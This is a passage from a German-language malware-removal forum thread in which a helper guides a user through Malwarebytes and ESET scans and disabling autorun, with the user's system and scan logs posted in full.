[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe" = C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe:*:Enabled:Spybot-S&D 2 Tray Icon -- (Safer-Networking Ltd.)
"C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe" = C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe:*:Enabled:Spybot-S&D 2 Scanner Service -- (Safer-Networking Ltd.)
"C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe" = C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe:*:Enabled:Spybot-S&D 2 Updater -- (Safer-Networking Ltd.)
"C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe" = C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe:*:Enabled:Spybot-S&D 2 Background update service -- (Safer-Networking Ltd.)
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0661576B-10A8-46B3-8D2C-54FF43DCE3C7}" = rport=1947 | protocol=17 | dir=in | app=c:\program files\dlubal\rstab 8.01\rstab.exe | 
"{25C02E7C-1B04-45FA-B93F-4BDC958660D8}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{33E242F6-0135-4440-80F7-01788D38E040}" = lport=808 | protocol=6 | dir=in | svc=nettcpactivator | app=c:\windows\microsoft.net\framework\v4.0.30319\smsvchost.exe | 
"{34D0BEDC-B262-4A7E-BEAA-E59CFA5F2618}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{38BACDF1-AE00-4B49-9B7B-DD942D6E6C7B}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{3F7E2AA6-AC7B-4E40-B7BA-4D12B38C5C77}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{43BCB5D6-2ED1-430E-9CC2-8DC899037EE9}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{4899E828-F302-47AB-BF67-9BE3CB9E0746}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{633D7583-7744-4A12-9AA6-A1F33E5EC5F7}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{6F27A51C-B841-4E3E-8F27-ED21322EB936}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{715EB053-E58E-4A62-A84A-6DB359DF20DE}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) | 
"{8F6E2C1A-F825-4D3F-BA4C-5E082F8D39A4}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{A56E0D78-AA50-4C94-BED9-383F6B7E311B}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe | 
"{AB054B57-F9A8-4776-BA03-8CCE29048F5D}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{AB975A9F-9A92-40F9-BB55-A74A5C9F9D86}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{AF6E7E1C-436F-42C7-86FA-3D9CCB059C7A}" = rport=1947 | protocol=6 | dir=in | app=c:\program files\dlubal\rstab 8.01\rstab.exe | 
"{C093DBB6-5C57-461F-909F-829698CE58EE}" = lport=10243 | protocol=6 | dir=in | app=system | 
"{C2BE5F09-3709-4F82-9D1F-E1E65DA465F3}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{C4511775-9671-407D-9EA2-4B37FE9C5C3A}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{CFACC4B1-80DB-4C1E-A3C2-C28118561466}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) | 
"{DE6924A5-2DDC-4CBE-AEBA-9934CCF30CB3}" = rport=1947 | protocol=6 | dir=out | app=c:\program files\dlubal\rstab 8.01\rstab.exe | 
"{ED571BAC-E4F7-42BE-92DC-88538EA52066}" = rport=1947 | protocol=17 | dir=out | app=c:\program files\dlubal\rstab 8.01\rstab.exe | 
"{EE31FC01-F67A-4E95-9BDD-D127EDCEBA4F}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe | 
"{F15F67D8-B00F-4CF0-8744-46AF8A8D6FCA}" = rport=10243 | protocol=6 | dir=out | app=system | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{05F25F55-60C3-4FD8-B1B7-F7394D1BBE7F}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{06E2D3F2-296A-48B8-BB09-FBFB2526C6A1}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe | 
"{0CE4B108-3793-476F-8B89-DF8B4EA83532}" = protocol=6 | dir=out | app=system | 
"{2A805A7D-CB6A-45BD-AEA4-8DBB9D1E322B}" = dir=in | app=c:\program files\windows live\contacts\wlcomm.exe | 
"{2B622086-3043-457C-98A1-885AD8FA5F41}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{3E0645A9-B0BA-43A0-A4F4-D705309F6D6F}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{607D3E59-8861-4197-9C3C-DF58F172DC55}" = protocol=6 | dir=in | app=c:\program files\opera\opera.exe | 
"{62F81FD3-36CC-471A-9CB2-F12FE2F4590C}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{680359BA-BA8D-43B8-BEF5-6E6C4A578DF6}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{7011DF90-EAC4-422A-91A6-1C318F299326}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{7F885568-2470-46ED-905B-C1CC74424C1C}" = dir=in | app=c:\program files\itunes\itunes.exe | 
"{9B8FF779-7FA3-4DEC-8E66-8343E60DE6A6}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{B22A4F2F-602D-4B11-8A8A-3A2AECBB7E1B}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{B2346774-7790-4AA0-BCE7-11E23056C8A1}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{B278A65E-3307-416B-8537-7EEACC3C58E5}" = dir=in | app=c:\windows\system32\hasplms.exe | 
"{B4C6C0E8-2E3F-4623-8774-AAA9AC5567CF}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{D7BFA196-D36B-4067-A519-08BBC550E0E2}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{E734BC5E-A423-4B83-93AE-05456EC3CE15}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{ECB81654-734A-4208-981B-A88BAD4C7B68}" = protocol=6 | dir=in | app=c:\program files\opera\opera.exe | 
"{F25720BE-1D67-45C7-993C-BAD72DF25CEE}" = protocol=17 | dir=in | app=c:\program files\opera\opera.exe | 
"{F4D36B68-D4F5-4D30-B600-2CB7BAD85DB3}" = protocol=17 | dir=in | app=c:\program files\opera\opera.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{04B34E21-5BEE-3D2B-8D3D-E3E80D253F64}" = Microsoft Visual C++ 2008 x86 ATL Runtime 9.0.30729
"{0A0CADCF-78DA-33C4-A350-CD51849B9702}" = Microsoft .NET Framework 4 Extended
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{117EBEEB-5DB0-43C8-9FD6-DD583DB152DD}" = Autodesk Material Library 2013
"{14866AAD-1F23-39AC-A62B-7091ED1ADE64}" = Microsoft Visual C++ 2008 x86 CRT Runtime 9.0.30729
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{268278CF-FB69-4D98-B70E-BFEC1CDCA225}" = iTunes
"{26A24AE4-039D-4CA4-87B4-2F83217021FF}" = Java 7 Update 21
"{27C6C0A2-2EC9-4FEA-BE2B-659EAAC2C68C}" = Autodesk Material Library Low Resolution Image Library 2013
"{299C0434-4F4E-341F-A916-4E07AEB35E79}" = Microsoft Visual Studio Tools for Applications 2.0 Runtime
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{37B33B16-2535-49E7-8990-32668708A0A3}" = Windows Live UX Platform Language Pack
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}" = Apple Application Support
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4B90093A-5D9C-3956-8ABB-95848BE6EFAD}" = Microsoft Visual C++ 2008 x86 OpenMP Runtime 9.0.30729
"{5783F2D7-A028-0409-0000-0060B0CE6BBA}" = DWG TrueView 2012
"{58760EEC-8B6A-43F4-81AA-696E381DFADD}" = Autodesk Material Library Medium Resolution Image Library 2013
"{606E12B9-641F-4644-A22A-FF38AE980AFD}" = Autodesk Material Library Base Resolution Image Library 2013
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{7346B4A0-1300-0100-0407-705C0D862004}" = Revit Architecture 2013
"{7346B4A0-1300-0101-0407-705C0D862004}" = Revit Architecture 2013 Language Pack - Deutsch
"{76DAEC83-AF7B-333C-8A53-83D7C7D39199}" = Microsoft Visual Studio Tools for Applications 2.0 Runtime Language Pack - DEU
"{7872DDBE-0C7C-4613-90EE-47707CD0A5B8}" = Dlubal RSTAB 8.01 32-bit
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform
"{850909E5-AA4B-46DA-BA2C-6471180E1438}" = ConDim 7.1.3 Demoversion
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8E87B944-4815-3C5E-947F-5035C9F64362}" = Microsoft Visual Studio Tools for Applications 2.0 Language Pack - DEU
"{90140000-0015-0407-0000-0000000FF1CE}" = Microsoft Office Access MUI (German) 2010
"{90140000-0015-0407-0000-0000000FF1CE}_Office14.SingleImage_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-0016-0407-0000-0000000FF1CE}" = Microsoft Office Excel MUI (German) 2010
"{90140000-0016-0407-0000-0000000FF1CE}_Office14.SingleImage_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-0018-0407-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (German) 2010
"{90140000-0018-0407-0000-0000000FF1CE}_Office14.SingleImage_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-0019-0407-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (German) 2010
"{90140000-0019-0407-0000-0000000FF1CE}_Office14.SingleImage_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001A-0407-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (German) 2010
"{90140000-001A-0407-0000-0000000FF1CE}_Office14.SingleImage_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001B-0407-0000-0000000FF1CE}" = Microsoft Office Word MUI (German) 2010
"{90140000-001B-0407-0000-0000000FF1CE}_Office14.SingleImage_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2010
"{90140000-001F-0407-0000-0000000FF1CE}_Office14.SingleImage_{65A2328E-FDFB-4CA3-8582-357EA6825FEA}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{99ACCA38-6DD3-48A8-96AE-A283C9759279}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2010
"{90140000-001F-0410-0000-0000000FF1CE}_Office14.SingleImage_{C0743197-FFEE-4C19-BAEB-8F7437DC4C8A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2010
"{90140000-002C-0407-0000-0000000FF1CE}_Office14.SingleImage_{4275FB46-ABDF-4456-876C-17CF64294D9A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-003D-0000-0000-0000000FF1CE}" = Microsoft Office Single Image 2010
"{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{047B0968-E622-4FAA-9B4B-121FA109EDDE}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2010
"{90140000-006E-0407-0000-0000000FF1CE}_Office14.SingleImage_{98EDFD9F-EA76-40CC-BCE9-92C69413F65B}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-00A1-0407-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (German) 2010
"{90140000-00A1-0407-0000-0000000FF1CE}_Office14.SingleImage_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}" = Microsoft Visual Studio Tools for Applications 2.0 - ENU
"{AC76BA86-7AD7-1031-7B44-AB0000000001}" = Adobe Reader XI (11.0.02) - Deutsch
"{B113D18C-67B0-4FB7-B329-E89B66194AE6}" = Windows Live Fotogalerie
"{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1" = Spybot - Search & Destroy
"{B42E259C-E4D4-37F1-A1B2-EB9C4FC5A04D}" = Microsoft Visual C++ 2008 x86 MFC Runtime 9.0.30729
"{C2AB7DC4-489E-4BE9-887A-52262FBADBE0}" = Windows Live Photo Common
"{C4972073-2BFE-475D-8441-564EA97DA161}" = QuickSet32
"{C6150D8A-86ED-41D3-87BB-F3BB51B0B77F}" = Windows Live ID Sign-in Assistant
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}" = SAMSUNG USB Driver for Mobile Phones
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E4E88B54-4777-4659-967A-2EED1E6AFD83}" = Windows Live Movie Maker
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F750C986-5310-3A5A-95F8-4EC71C8AC01C}" = Microsoft .NET Framework 4 Client Profile DEU Language Pack
"{F95E4EE0-0C6E-4273-B6B9-91FD6F071D76}" = Windows Live Essentials
"{FA0BBB87-91A1-4BFD-9005-EB058BBA0E14}_is1" = StreamTransport version: 1.0.2.2171
"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Autodesk Revit Architecture 2013" = Autodesk Revit Architecture 2013
"Autodesk Revit Architecture 2013 UR1" = Autodesk Revit Architecture 2013 UR1
"Autodesk Revit Architecture 2013 UR2" = Autodesk Revit Architecture 2013 UR2
"Avira AntiVir Desktop" = Avira Free Antivirus
"CCleaner" = CCleaner
"Dlubal RSTAB 8.01 32-bit" = Dlubal RSTAB 8.01 32-bit
"DWG TrueView 2012" = DWG TrueView 2012
"FileHippo.com" = FileHippo.com Update Checker
"FLV Player" = FLV Player 2.0 (build 25)
"Free YouTube to MP3 Converter_is1" = Free YouTube to MP3 Converter version 3.12.1.320
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware Version 1.75.0.1300
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Microsoft .NET Framework 4 Client Profile DEU Language Pack" = Microsoft .NET Framework 4 Client Profile DEU Language Pack
"Microsoft .NET Framework 4 Extended" = Microsoft .NET Framework 4 Extended
"Mozilla Firefox 20.0.1 (x86 en-US)" = Mozilla Firefox 20.0.1 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"mp3Tag Pro_is1" = mp3Tag Pro 7.3
"NVIDIA Drivers" = NVIDIA Drivers
"Office14.SingleImage" = Microsoft Office Home and Student 2010
"Opera 12.15.1748" = Opera 12.15
"PDF Editor 3" = PDF Editor 3
"Pdf995" = Pdf995
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"WinLiveSuite" = Windows Live Essentials
"WinRAR archiver" = WinRAR 4.20 (32-bit)
 
========== HKEY_USERS Uninstall List ==========
 
[HKEY_USERS\S-1-5-21-3147314951-3717049883-3254179350-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"FileZilla Client" = FileZilla Client 3.7.0.1
"pdfsam" = pdfsam
 
========== Last 20 Event Log Errors ==========
 
[ Autodesk REX Events ]
Error - 15.03.2012 19:00:23 | Computer Name = *** | Source = AREX | ID = 0
Description = AREX.Revit - REX startup failed: Der Prozess kann nicht auf die Datei
 "C:\Users\\AppData\Roaming\Autodesk\REX\2012\Revit\Architecture\tree_Revit.xml"
 zugreifen, da sie von einem anderen Prozess verwendet wird.: Der Prozess kann nicht
 auf die Datei "C:\Users\\AppData\Roaming\Autodesk\REX\2012\Revit\Architecture\tree_Revit.xml"
 zugreifen, da sie von einem anderen Prozess verwendet wird.; StackTrace:    bei
 System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)     bei System.IO.FileStream.Init(String
 path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare
 share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String
 msgPath, Boolean bFromProxy, Boolean useLongPath)     bei System.IO.FileStream..ctor(String
 path, FileMode mode, FileAccess access, FileShare share)     bei System.Xml.XmlDocument.Save(String
 filename)     bei QS2m594yqgFwFs4Prm.TDiiO3BYlSLBHcdksl.bbsq2e184(String )     bei 
REX.Manager.Manager.FindNewModules(REXContext context, Settings settings)     bei 
REX.Common.Start.REXStartProxy.j26xMSA2g(Dictionary`2& , List`1& )     bei REX.Common.Start.REXStartProxy.OnStartup()
 
[ Spybot - Search and Destroy Events ]
Error - 20.12.2012 11:37:21 | Computer Name = *** | Source = SDCleaner | ID = 100
Description = LoadCleaningInstructions
 
 
< End of report >

--- --- ---

cosinus · 25.05.2013, 19:39

Sieht ok aus. Wir sollten fast durch sein. Mach bitte zur Kontrolle einen Vollscan mit Malwarebytes Anti-Malware (MBAM) (falls du vor kurzem erst einen Vollscan gemacht hast, reicht auch ein Quickscan (spart Zeit), das dann mir bitte auch mitteilen)

Hinweis: Denk bitte vorher daran, Malwarebytes Anti-Malware über den Updatebutton zu aktualisieren!

Anschließend über den OnlineScanner von ESET eine zusätzliche Meinung zu holen ist auch nicht verkehrt:

ESET Online Scanner

Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
Lade und starte Eset Online Scanner
Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
Klicke auf Starten.
Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
Klicke am Ende des Suchlaufs auf Fertig stellen.
Schließe das Fenster von ESET.
Explorer öffnen.
C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
Logfile hier posten.
Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset

MA2413 · 25.05.2013, 21:47

Eset und Malewarebytes haben beide nichts gefunden

Ich hätte noch eine Frage:
- Wenn ich eine externe Festplatte scannen lasse, genügt es wirklich nur die Shift taste gedrückt zu halten um diese abzukapseln, kann dann nichts mehr passieren?

cosinus · 26.05.2013, 17:40

Die Logs solltest du doch wie in meiner Einleitung erwähnt immer posten

Zitat:

- Wenn ich eine externe Festplatte scannen lasse, genügt es wirklich nur die Shift taste gedrückt zu halten um diese abzukapseln, kann dann nichts mehr passieren?

Automatische Wiedergabe (Autorun) deaktivieren

Lesestoff:
Aufgabe von Autorun

Die Hauptaufgabe von Autorun besteht darin, auf Hardwareaktionen, die auf einem Computer gestartet werden, softwareseitig zu reagieren. Autorun bietet die folgenden Funktionen:

Doppelklicken
Kontextmenü
Automatische Wiedergabe

Diese Funktionen werden typischerweise von Wechselmedien oder Netzwerkfreigaben aufgerufen. Während der automatischen Wiedergabe wird die Datei "Autorun.inf" auf dem Medium analysiert. Diese Datei legt fest, welche Befehle vom System ausgeführt werden. Viele Firmen nutzen diese Funktionalität zum Starten von Installationsprogrammen.

Das Problem bzw. das Sicherheitsrisiko besteht darin, dass die Autorun-Funktion missbraucht werden kann, um automatisch zB auf infizierten USB-Sticks eine Schädlingsdatei (die in der autorun.inf definiert ist) auszuführen. Ich empfehle dir daher dringend, Autorun komplett zu deaktivieren.

Windows XP: Zur Vereinfachung hab ich die Datei noautorun.reg hochgeladen. Lade sie bitte auf den Desktop herunter, führ die Datei per Doppelklick aus und bestätige mit ja. Nach einem Neustart des Rechners ist die automatische Wiedergabe (von Datenträgern) auf allen Laufwerken deaktiviert, d.h. keine CD, kein Stick oder sonstwas startet nach dem Einstecken mehr automatisch.

Falls die o.g. Datei noautorun.reg nicht herunterladbar sein sollte, hier der Inhalt der noautorun.reg; einfach in eine Textdatei kopieren und diese als noautorun.reg Datei abspeichern und per Doppelklick ausführen um es in die Registry zu schreiben:

Code:

ATTFilter

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:000000ff

Windows Vista/7: In der Systemsteuerung unter automatische Wiedergabe von CDs und anderen Medien alles deaktivieren. => siehe auch Einstellungen für automatische Wiedergabe ändern

MA2413 · 26.05.2013, 19:31

Habe jetzt nochmal gescannt, mit angeschlossener externen Festplatte, Malwartebytes hat was gefunden auf der Externen:

Code:

ATTFilter

 ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=e3ef5c95ef2b6743b9b1dab921b7a243
# engine=13919
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2013-05-26 05:41:06
# local_time=2013-05-26 07:41:06 (+0100, Mitteleuropäische Sommerzeit)
# country="Austria"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode=1799 16775165 100 100 5847 235013356 0 0
# compatibility_mode=5893 16776573 100 94 19271 121221257 0 0
# scanned=177663
# found=0
# cleaned=0
# scan_time=2026

Code:

ATTFilter

 Malwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Datenbank Version: v2013.05.26.05

Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 10.0.9200.16576
*** :: *** [Administrator]

26.05.2013 19:45:21
MBAM-log-2013-05-26 (20-27-50).txt

Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|E:\|)
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 374970
Laufzeit: 42 Minute(n), 8 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 1
E:\System Volume Information\_restore{7674160D-C371-402E-8C83-D0EA98B6A103}\RP390\A0095018.exe (Malware.Packer.Gen) -> Keine Aktion durchgeführt.

(Ende)

Ach ja, als Malewarebytes den Fund meldete, meldete sich Avira auch zu Wort (2 Funde):

Code:

ATTFilter

Avira Free Antivirus
Erstellungsdatum der Reportdatei: Sonntag, 26. Mai 2013  20:17

Es wird nach 4728353 Virenstämmen gesucht.

Das Programm läuft als uneingeschränkte Vollversion.
Online-Dienste stehen zur Verfügung.

Lizenznehmer   : Avira Free Antivirus
Seriennummer   : 0000149996-ADJIE-0000001
Plattform      : Windows 7 Home Premium
Windowsversion : (Service Pack 1)  [6.1.7601]
Boot Modus     : Normal gebootet
Benutzername   : SYSTEM
Computername   : ***

Versionsinformationen:
BUILD.DAT      : 12.1.9.1236    40872 Bytes  11.10.2012 15:29:00
AVSCAN.EXE     : 12.3.0.48     468256 Bytes  14.11.2012 16:46:08
AVSCAN.DLL     : 12.3.0.15      66256 Bytes  08.05.2012 19:08:27
LUKE.DLL       : 12.3.0.15      68304 Bytes  08.05.2012 19:08:27
AVSCPLR.DLL    : 12.3.0.14      97032 Bytes  08.05.2012 19:08:27
AVREG.DLL      : 12.3.0.17     232200 Bytes  10.05.2012 19:07:56
VBASE000.VDF   : 7.11.70.0   66736640 Bytes  04.04.2013 16:23:58
VBASE001.VDF   : 7.11.74.226  2201600 Bytes  30.04.2013 09:50:37
VBASE002.VDF   : 7.11.74.227     2048 Bytes  30.04.2013 09:50:37
VBASE003.VDF   : 7.11.74.228     2048 Bytes  30.04.2013 09:50:37
VBASE004.VDF   : 7.11.74.229     2048 Bytes  30.04.2013 09:50:37
VBASE005.VDF   : 7.11.74.230     2048 Bytes  30.04.2013 09:50:37
VBASE006.VDF   : 7.11.74.231     2048 Bytes  30.04.2013 09:50:37
VBASE007.VDF   : 7.11.74.232     2048 Bytes  30.04.2013 09:50:37
VBASE008.VDF   : 7.11.74.233     2048 Bytes  30.04.2013 09:50:37
VBASE009.VDF   : 7.11.74.234     2048 Bytes  30.04.2013 09:50:37
VBASE010.VDF   : 7.11.74.235     2048 Bytes  30.04.2013 09:50:37
VBASE011.VDF   : 7.11.74.236     2048 Bytes  30.04.2013 09:50:37
VBASE012.VDF   : 7.11.74.237     2048 Bytes  30.04.2013 09:50:37
VBASE013.VDF   : 7.11.74.238     2048 Bytes  30.04.2013 09:50:37
VBASE014.VDF   : 7.11.75.97    181248 Bytes  02.05.2013 11:12:53
VBASE015.VDF   : 7.11.75.183   217600 Bytes  03.05.2013 15:45:40
VBASE016.VDF   : 7.11.76.27    183808 Bytes  04.05.2013 16:08:23
VBASE017.VDF   : 7.11.76.101   194048 Bytes  06.05.2013 16:08:48
VBASE018.VDF   : 7.11.76.213   163328 Bytes  07.05.2013 16:18:56
VBASE019.VDF   : 7.11.77.41    134656 Bytes  08.05.2013 20:11:42
VBASE020.VDF   : 7.11.77.145   141312 Bytes  10.05.2013 20:11:42
VBASE021.VDF   : 7.11.77.225   155648 Bytes  12.05.2013 20:11:40
VBASE022.VDF   : 7.11.78.21    202752 Bytes  13.05.2013 20:11:40
VBASE023.VDF   : 7.11.78.71    140800 Bytes  13.05.2013 20:11:40
VBASE024.VDF   : 7.11.78.147   167936 Bytes  15.05.2013 20:11:40
